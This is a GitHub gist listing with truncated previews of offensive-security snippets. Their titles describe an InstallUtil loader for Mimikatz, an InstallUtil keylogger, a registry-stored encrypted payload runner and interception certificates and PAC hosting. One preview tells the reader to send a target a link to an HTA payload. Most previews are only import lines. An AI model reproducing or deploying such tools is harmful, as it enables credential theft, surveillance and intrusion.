
Nicholas McKinney nicholasmckinney

nicholasmckinney / Utility.cs
Created May 8, 2017 00:27
InstallUtility Functions
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
nicholasmckinney / InterceptorCertGen.ps1
Created May 8, 2017 00:27
Windows Nano Server - Certificate Generation and Installation
function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA)
{
$CAsubject = $certSubject
$dn = new-object -com "X509Enrollment.CX500DistinguishedName"
$dn.Encode( "CN=" + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
#Issuer Property for cleanup
$issuer = "__Interceptor_Trusted_Root"
$issuerdn = new-object -com "X509Enrollment.CX500DistinguishedName"
$issuerdn.Encode("CN=" + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
# Create a new Private Key
nicholasmckinney / list
Created May 8, 2017 00:27
Infosec Team - Book List
Infosec Team Book List
The Cuckoo's Egg - Cliff Stoll
Hacking: The Art of Exploitation - Jon Erickson
The Art of Memory Forensics - Michael Hale Ligh, Andrew Case, Jamie Levy, AAron Walters
Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground - Kevin Poulsen
Ghost in the Wires: My Adventures as the World's Most Wanted Hacker - Kevin Mitnick
Daemon - Daniel Suarez
nicholasmckinney / PELoader.cs
Created May 8, 2017 00:27
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
nicholasmckinney / iukl.cs
Created May 8, 2017 00:27
InstallUtil Keylogger/MouseClick Recorder - Stores Logs in [Documents\Klog-Logs]
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
* https://code.google.com/p/klog-sharp/
*/
nicholasmckinney / RSAGuts.ps1
Created May 8, 2017 00:27
RSA Algorithm in PowerShell. Just Cause
<#
Created By Casey Smith
@subTee
RSA in PowerShell.
Just Cause...
Reference notes for the curious
p = 61 <= first prime number (destroy this after computing e and d)
q = 53 <= second prime number (destroy this after computing e and d)
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
function Receive-Request {
param(
$Request
)
$output = ""
nicholasmckinney / web.config
Created May 8, 2017 00:27
Encrypt Random Shit with aspnet_regiis.exe
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<!-- Encrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pef "secretStuff" "C:\Tools" -->
<!-- Decrypt Element -> C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe -pdf "secretStuff" "C:\Tools" -->
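<!-- See https://msdn.microsoft.com/en-us/library/2w117ede.aspx -->
<!-- Note: with no -prov argument, aspnet_regiis uses the default RSA provider and its machine-level key container, so the section can be decrypted by any account on this machine that has been granted access to that container; it protects the file at rest, not against code already running with that access. -->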
<!-- Example by @subTee -->
<connectionStrings>
<add name="constr" connectionString="blah" />
</connectionStrings>
<system.web>
function Start-PACFileHosting()
{
# Example PAC File Hosting
# Pattern after http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html
# example: http://localhost:8083/i.pac
# Be Certain Line 19 matches your Interceptor Config
Start-Job -ScriptBlock {
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8083/")
nicholasmckinney / RegRunner.cs
Created May 8, 2017 00:28
Executes Encrypted File From Registry
using System;
using System.IO;
using System.Text;
using Microsoft.Win32;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;